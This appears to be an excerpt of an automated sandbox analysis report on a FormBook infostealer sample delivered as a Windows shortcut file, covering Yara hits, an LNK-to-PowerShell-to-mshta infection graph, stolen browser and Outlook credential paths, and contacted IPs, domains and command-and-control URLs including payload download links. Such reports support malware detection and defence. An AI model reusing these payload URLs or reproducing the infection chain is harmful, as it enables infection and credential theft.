Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 7.2.rooma.exe.9b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3836687746.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1603904301.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1604384036.00000000014C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3836874954.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3837430947.00000000023A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1605472328.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\netbtugc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 7.2.rooma.exe.9b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3836687746.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1603904301.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1604384036.00000000014C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3836874954.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3837430947.00000000023A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1605472328.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1446727 Sample: Offer Document 24.lnk Startdate: 23/05/2024 Architecture: WINDOWS Score: 100 49 www.joyesi.xyz 2->49 51 www.magmadokum.com 2->51 53 18 other IPs or domains 2->53 67 Snort IDS alert for network traffic 2->67 69 Malicious sample detected (through community Yara rule) 2->69 71 Antivirus detection for URL or domain 2->71 75 12 other signatures 2->75 12 powershell.exe 11 2->12         started        15 svchost.exe 1 1 2->15         started        signatures3 73 Performs DNS queries to domains with low reputation 49->73 process4 dnsIp5 91 Windows shortcut file (LNK) starts blacklisted processes 12->91 93 Powershell drops PE file 12->93 18 mshta.exe 16 12->18         started        23 conhost.exe 1 12->23         started        63 127.0.0.1 unknown unknown 15->63 signatures6 process7 dnsIp8 55 20.86.128.223, 49705, 49706, 80 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 18->55 45 C:\Users\user\AppData\Local\...\room4[1].hta, HTML 18->45 dropped 77 Windows shortcut file (LNK) starts blacklisted processes 18->77 79 Suspicious powershell command line found 18->79 25 powershell.exe 14 17 18->25         started        file9 signatures10 process11 file12 47 C:\Users\user\AppData\Roaming\rooma.exe, PE32 25->47 dropped 28 rooma.exe 25->28         started        31 conhost.exe 25->31         started        process13 signatures14 95 Antivirus detection for dropped file 28->95 97 Multi AV Scanner detection for dropped file 28->97 99 Machine Learning detection for dropped file 28->99 101 Maps a DLL or memory area into another process 28->101 33 TmjHHkXnMrncRmISMzN.exe 28->33 injected process15 signatures16 65 Found direct / indirect Syscall (likely to bypass EDR) 33->65 36 netbtugc.exe 13 33->36         started        process17 signatures18 81 Tries to steal Mail credentials (via file / registry access) 36->81 83 Tries to harvest and steal browser information (history, passwords, etc) 36->83 85 Modifies the context of a thread in another process (thread injection) 36->85 87 2 other signatures 36->87 39 TmjHHkXnMrncRmISMzN.exe 36->39 injected 43 firefox.exe 36->43         started        process19 dnsIp20 57 www.joyesi.xyz 185.237.107.49, 49756, 49757, 49758 UA-WEECOMI-ASUA Ukraine 39->57 59 www.rssnewscast.com 91.195.240.94, 49732, 49733, 49734 SEDO-ASDE Germany 39->59 61 10 other IPs or domains 39->61 89 Found direct / indirect Syscall (likely to bypass EDR) 39->89 signatures21
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
91.195.240.94
 www.rssnewscast.com Germany
47846 SEDO-ASDE false
185.237.107.49
 www.joyesi.xyz Ukraine
56421 UA-WEECOMI-ASUA true
34.111.148.214
 www.660danm.top United States
15169 GOOGLEUS false
116.50.37.244
 www.goldenjade-travel.com Taiwan; Republic of China (ROC)
18046 DONGFONG-TWDongFongTechnologyCoLtdTW false
23.227.38.74
 shops.myshopify.com Canada
13335 CLOUDFLARENETUS false
85.159.66.93
 natroredirect.natrocdn.com Turkey
34619 CIZGITR false
202.172.28.202
 www.kasegitai.tokyo Japan 37907 DIGIROCKDigiRockIncJP false
66.29.149.46
 www.techchains.info United States
19538 ADVANTAGECOMUS false
154.215.72.110
 www.3xfootball.com Seychelles
132839 POWERLINE-AS-APPOWERLINEDATACENTERHK false
195.110.124.133
 elettrosistemista.zip Italy
39729 REGISTER-ASIT false
46.30.213.191
 www.antonio-vivaldi.mobi Denmark
51468 ONECOMDK false
20.86.128.223
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS true
217.196.55.202
 empowermedeco.com Norway
29300 AS-DIRECTCONNECTNO false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
www.660danm.top 34.111.148.214 true
empowermedeco.com 217.196.55.202 true
www.joyesi.xyz 185.237.107.49 true
shops.myshopify.com 23.227.38.74 true
natroredirect.natrocdn.com 85.159.66.93 true
www.kasegitai.tokyo 202.172.28.202 true
elettrosistemista.zip 195.110.124.133 true
www.3xfootball.com 154.215.72.110 true
www.shenzhoucui.com 104.206.198.212 true
www.antonio-vivaldi.mobi 46.30.213.191 true
www.goldenjade-travel.com 116.50.37.244 true
www.rssnewscast.com 91.195.240.94 true
www.techchains.info 66.29.149.46 true
www.magmadokum.com unknown unknown
www.donnavariedades.com unknown unknown
www.liangyuen528.com unknown unknown
www.empowermedeco.com unknown unknown
www.k9vyp11no3.cfd unknown unknown
www.elettrosistemista.zip unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.donnavariedades.com/fo8o/?Plm0mn68=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pFBqtQGck9fp1rRtCXud2beKokCA0CIPwH0kByjXVEoJ79g==&kzN4Y=k0xDPL false
  • Avira URL Cloud: safe
 unknown
http://www.3xfootball.com/fo8o/?kzN4Y=k0xDPL&Plm0mn68=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1aOjYc66J7Y/iHKqqtd6zR7stgJ4hm8X7oMbvduFmUyU2g== false
  • Avira URL Cloud: safe
 unknown
http://www.kasegitai.tokyo/fo8o/?Plm0mn68=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8r+KEwUMhhIOLRL5gTEM7bFlULXRyxxVa+trARU9e5ZGGZA==&kzN4Y=k0xDPL false
  • Avira URL Cloud: malware
 unknown
http://www.magmadokum.com/fo8o/?kzN4Y=k0xDPL&Plm0mn68=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjKEsqfuFkq5cAQSWi7WA8E0wwXs8UZjiSCj3RZ8cyRYh4cA== false
  • Avira URL Cloud: malware
 unknown
http://www.joyesi.xyz/fo8o/ false
  • Avira URL Cloud: safe
 unknown
http://www.antonio-vivaldi.mobi/fo8o/ false
  • Avira URL Cloud: safe
 unknown
http://www.elettrosistemista.zip/fo8o/?kzN4Y=k0xDPL&Plm0mn68=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLyJvXbOnx1XXjd4sQOb9JZJsSiXIk2nToiXJsgHURydTcQ== false
  • Avira URL Cloud: malware
 unknown
http://www.goldenjade-travel.com/fo8o/?kzN4Y=k0xDPL&Plm0mn68=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2yArpDgvi6oTdq6vPucKXgoaIsT3InbTvvq+zcnCyLgXuQ== false
  • Avira URL Cloud: safe
 unknown
http://www.rssnewscast.com/fo8o/?Plm0mn68=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNup0fu2K1aHG/1RRjejs3ag7ONVYGhhFLwGMDRFljOPFYJw==&kzN4Y=k0xDPL false
  • Avira URL Cloud: safe
 unknown
http://20.86.128.223/room/rooma.exe true
  • Avira URL Cloud: safe
 unknown
http://www.empowermedeco.com/fo8o/ false
  • Avira URL Cloud: malware
 unknown
http://www.empowermedeco.com/fo8o/?Plm0mn68=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfAZWzpPAGosIZrfQfUSvJErRFr5z6zwQDc//Mk8r+NzcRQ==&kzN4Y=k0xDPL false
  • Avira URL Cloud: malware
 unknown
http://www.660danm.top/fo8o/ false
  • Avira URL Cloud: malware
 unknown
http://www.magmadokum.com/fo8o/ false
  • Avira URL Cloud: malware
 unknown
http://www.rssnewscast.com/fo8o/ false
  • Avira URL Cloud: safe
 unknown
http://www.660danm.top/fo8o/?kzN4Y=k0xDPL&Plm0mn68=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrOfHwa9C8Q+9ZQoBQJyEcpoFJdl2tDobRnKnc0fEkX8JY0Q== false
  • Avira URL Cloud: malware
 unknown
http://www.kasegitai.tokyo/fo8o/ false
  • Avira URL Cloud: malware
 unknown
http://www.goldenjade-travel.com/fo8o/ false
  • Avira URL Cloud: safe
 unknown
http://20.86.128.223/room/room4.hta true
  • Avira URL Cloud: safe
 unknown
http://www.elettrosistemista.zip/fo8o/ false
  • Avira URL Cloud: malware
 unknown
http://www.antonio-vivaldi.mobi/fo8o/?Plm0mn68=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZdmVZ54UmbyKF16zvv1yGe3hSwRWBn0bZic9A2kho+UJ9gA==&kzN4Y=k0xDPL false
  • Avira URL Cloud: safe
 unknown
http://www.donnavariedades.com/fo8o/ false
  • Avira URL Cloud: safe
 unknown
http://www.joyesi.xyz/fo8o/?kzN4Y=k0xDPL&Plm0mn68=4jpq/azRsxa5RUjY86tNWfjSBjUfGmQA/bC5edk8IUrTRSqWoRPa/8wzulAZuqVnvDzKNkDL1IzsWztH+C0vz/DDu79arRp32UcJsNkv7g6dr0ICiHZvS3tESvUt5oYRbw== false
  • Avira URL Cloud: safe
 unknown
http://www.techchains.info/fo8o/ false
  • Avira URL Cloud: phishing
 unknown